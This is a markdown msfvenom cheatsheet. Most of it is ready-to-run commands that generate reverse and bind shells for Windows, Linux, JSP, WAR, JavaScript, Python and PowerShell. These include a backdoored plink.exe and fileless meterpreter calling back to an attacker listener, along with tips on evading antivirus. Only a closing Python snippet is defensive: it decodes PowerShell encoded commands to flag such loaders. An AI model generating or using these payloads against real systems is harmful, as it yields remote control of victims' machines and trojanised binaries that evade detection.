# MSFvenom Cheatsheet

## Shellcode Generation

### Windows Reverse TCP Shell (Shellcode x86)

Only use this one if payload size is no problem and you can't determine the bad chars:

```sh
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"
```

### Windows Reverse TCP Shell Embedded in `plink.exe`

Note: the `shikata_ga_nai` encoder is deprecated and easily detected by modern AV. Use `-e x64/zutto_dekiru` for x64, or skip encoding entirely if it is not needed.

```sh
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe -x /usr/share/windows-binaries/plink.exe -o burmat_embedded.exe
```

### Bind Shell Shellcode

```sh
msfvenom -p windows/shell_bind_tcp RHOST=10.11.11.11 LPORT=1337 -b '\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40' -f python
```

## Reverse Shells

Oddball reverse shells that can trip you up. Those "Wait, I've done this before?" moments. Like when you see Tomcat running with default credentials or a ColdFusion site.

### JSP Reverse Shell

```sh
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f raw -o burmat.jsp
```

### JavaScript Reverse Shells

If you are attacking a Windows host:

```sh
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f js_le -e generic/none
```

If you are attacking a Linux host:

```sh
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 CMD=/bin/bash -f js_le -e generic/none
```

### WAR (Java) Reverse Shell

```sh
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f war -o burmat.war
```

## Modern Payloads

### PowerShell One-Liner (Base64 Encoded)

Generate a PowerShell payload that can be executed directly via command line. Useful for remote execution without touching disk.

```sh
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f psh-cmd
```

### Python Stageless Payload

Stageless payloads are more reliable and don't require callback staging. Great for Linux targets with Python installed.

```sh
msfvenom -p python/meterpreter_reverse_https LHOST=10.10.10.10 LPORT=443 -f raw -o burmat.py
```

### Windows Stageless Meterpreter (x64)

Stageless payloads include the full meterpreter in the payload, avoiding multi-stage detection. Larger file size but more reliable.

```sh
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o burmat.exe
```

### PowerShell Reflection (Fileless)

Generate PowerShell that loads meterpreter via reflection, never touching disk. Best for modern Windows environments with logging.

```sh
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f psh-reflection -o burmat.ps1
```
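For the defender side of the `psh-cmd` and `psh-reflection` entries above, here is an added example (not from the original cheatsheet) in Python: it pulls the `-EncodedCommand` argument out of a process-creation command line, decodes the UTF-16LE base64 the same way PowerShell does, and scores the script on markers these in-memory stubs tend to carry. The log lines and scripts are constructed, and the marker list is an assumption about what the generated stub contains, not a signature taken from msfvenom itself.

```python
import base64
import re

# Markers typical of an msfvenom psh-cmd / psh-reflection stub (assumed, in-memory loader).
INDICATORS = ("[IntPtr]::Size", "syswow64\\WindowsPowerShell", "VirtualAlloc",
              "DllImport", "Invoke-Expression", "FromBase64String")

def is_encoded_flag(arg):
    """PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...)."""
    a = arg.lower()
    return len(a) > 1 and a[0] in "-/" and "encodedcommand".startswith(a[1:])

def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand <base64(UTF-16LE)>, else None."""
    argv = cmdline.split()
    for flag, blob in zip(argv, argv[1:]):
        if is_encoded_flag(flag):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def score_cmdline(cmdline):
    """Decode the embedded script and count loader indicators; -w hidden adds weight."""
    script = decode_encoded_command(cmdline)
    hits = [] if script is None else [m for m in INDICATORS if m.lower() in script.lower()]
    hidden = re.search(r"-w\S*\s+hidden", cmdline, re.I) is not None
    return {"decoded": script, "hits": hits, "hidden_window": hidden,
            "suspicious": len(hits) >= 2 or (hidden and len(hits) >= 1)}

def encode_ps(script):
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed samples: a script carrying only the *markers* of a psh stub (not a
# working loader), a benign admin command, and a plain script invocation.
SUSPICIOUS_SCRIPT = ("if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir"
                     "+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};"
                     "# constructed marker text: DllImport VirtualAlloc")
BENIGN_SCRIPT = "Get-Service | Where-Object Status -eq Running | Out-File C:\\temp\\svc.txt"
SAMPLE_LOG = [  # constructed process-creation command lines (e.g. Sysmon Event ID 1)
    f"powershell.exe -nop -w hidden -e {encode_ps(SUSPICIOUS_SCRIPT)}",
    f"powershell.exe -ExecutionPolicy Bypass -EncodedCommand {encode_ps(BENIGN_SCRIPT)}",
    "powershell.exe -File C:\\scripts\\backup.ps1",
]

def triage(lines):
    """One verdict per command line; feed it the CommandLine field of your process logs."""
    return [score_cmdline(line)["suspicious"] for line in lines]
```

Decoding before matching matters because the base64 form of the same script changes with every byte of difference, so string rules on the raw command line miss it.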
